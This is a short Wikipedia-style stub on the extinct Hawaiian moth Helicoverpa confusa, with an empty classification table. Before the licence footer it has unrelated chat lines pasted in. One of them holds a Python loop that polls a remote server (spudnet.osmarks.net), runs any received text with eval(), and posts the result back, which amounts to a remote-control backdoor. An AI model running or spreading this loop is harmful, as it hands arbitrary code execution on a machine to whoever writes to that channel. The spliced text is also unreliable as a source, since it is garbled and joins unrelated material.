Confused moth

The confused moth (Helicoverpa confusa) is an extinct species of moth in the family Noctuidae.

Confused moth
Scientific classification
Kingdom:
Phylum:
Class:
Order:
Family:
Genus:
Species:
H. confusa
Binomial name
Helicoverpa confusa
Hardwick, 1965

It was endemic to Hawaii.

Sources


gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```Using the new SPUDNET-HTTP API.
gollark: Make it continuously ping osmarks.net so you know what it's up to.
gollark: Routers can do this.
gollark: Or give it a static IP, even?!
gollark: If it's on a LAN just... use the local IP?
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.